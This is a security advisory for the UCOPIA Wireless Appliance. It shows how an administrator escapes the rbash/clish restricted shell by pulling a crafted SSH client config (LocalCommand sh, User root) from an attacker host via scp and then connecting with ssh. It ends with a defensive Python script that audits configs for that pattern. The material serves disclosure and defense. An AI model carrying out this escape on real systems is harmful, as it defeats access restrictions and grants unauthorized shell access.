Administrators can connect to their UCOPIA Wireless Appliance through the SSH (TCP/22) or Web SSH (TCP/222) interfaces. The system shell is restricted by means of rbash and clish: specific commands or flags are deliberately disallowed, so a malicious administrator might want to escape from this shell in order to execute arbitrary commands.
The vulnerability lies in the handling of the ~/.ssh/config file on the UCOPIA system: OpenSSH reads this file when connecting to other machines through SSH. A malicious administrator can abuse the LocalCommand directive to start a sh shell locally once the connection is established, thereby obtaining an unrestricted shell.
Login as admin (SSH / Web SSH): you obtain a restricted shell (the prompt is “>”).
Then, use scp (or any other available technique) on the appliance to retrieve a malicious .ssh/config file from the attacker machine. The malicious ~/.ssh/config file must contain the following:
Host *
    PermitLocalCommand yes
    LocalCommand sh
    User root
- PermitLocalCommand allows the use of the LocalCommand directive. We can set it because it is not forbidden by the global SSH configuration.
- LocalCommand is the command to run after the SSH connection is established. Here we want an unrestricted shell, so we choose “sh”.
We prepare the malicious .ssh/config on the attacker’s side and store it in /tmp/config.
We download the file from the attacker’s machine (172.16.17.43) onto the appliance and save it as ~/.ssh/config:
> scp root@ATTACKER_IP:/tmp/config .ssh/config
We confirm that the file is present and connect again to the attacker’s machine (172.16.17.43), this time with ssh. We can see that we obtain an unrestricted shell (note the normal “$” prompt) once the connection is established.
> ssh ATTACKER_IP
$ # unrestricted shell
We are in a chroot sandbox, so many standard commands are missing.
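As an added example (not part of the original advisory), the following Python audit script parses a file in ssh_config format and reports the Host blocks that enable PermitLocalCommand or carry a LocalCommand directive, which are the two settings this escape relies on. The config embedded in it is a constructed sample; the function names are ours.

```python
"""Audit an OpenSSH client config (ssh_config format) for LocalCommand use.

Added example for the UCOPIA advisory; not part of the original report.
It parses ~/.ssh/config-style text and flags Host blocks that enable
PermitLocalCommand or carry a LocalCommand directive.
"""
import re

# Directives of interest; OpenSSH compares keywords case-insensitively.
WATCH = {"permitlocalcommand", "localcommand"}


def parse_ssh_config(text):
    """Return a list of (host_pattern, {keyword: value}) blocks.

    Handles 'Key value' and 'Key=value' forms, comment lines, blank lines
    and keyword case-insensitivity. Directives before the first Host line
    are placed in a '*' block since they apply to every host.
    """
    blocks = []
    current = ("*", {})
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^(\w+)\s*(?:=|\s)\s*(.*)$", line)
        if not m:
            continue  # bare keyword without a value; ignore
        key, value = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            blocks.append(current)
            current = (value, {})
        else:
            # OpenSSH keeps the first value seen for a keyword; mirror that.
            current[1].setdefault(key, value)
    blocks.append(current)
    return [b for b in blocks if b[1]]


def find_local_command_use(text):
    """Return (host_pattern, keyword, value) for every suspicious directive."""
    findings = []
    for host, opts in parse_ssh_config(text):
        for key, value in opts.items():
            if key in WATCH and not (key == "permitlocalcommand" and value.lower() == "no"):
                findings.append((host, key, value))
    return findings


# Constructed sample: a benign entry followed by the shape from the advisory.
SAMPLE = """\
# benign host entry
Host build
    HostName build.internal.example
    User ci

Host *
    PermitLocalCommand yes
    LocalCommand sh
    User root
"""

if __name__ == "__main__":
    for host, key, value in find_local_command_use(SAMPLE):
        print(f"Host {host!r}: {key} = {value!r}")
```

Run it against each administrator's ~/.ssh/config on the appliance; any non-empty result deserves a look, since the restricted shell has no legitimate reason to run local commands on connect.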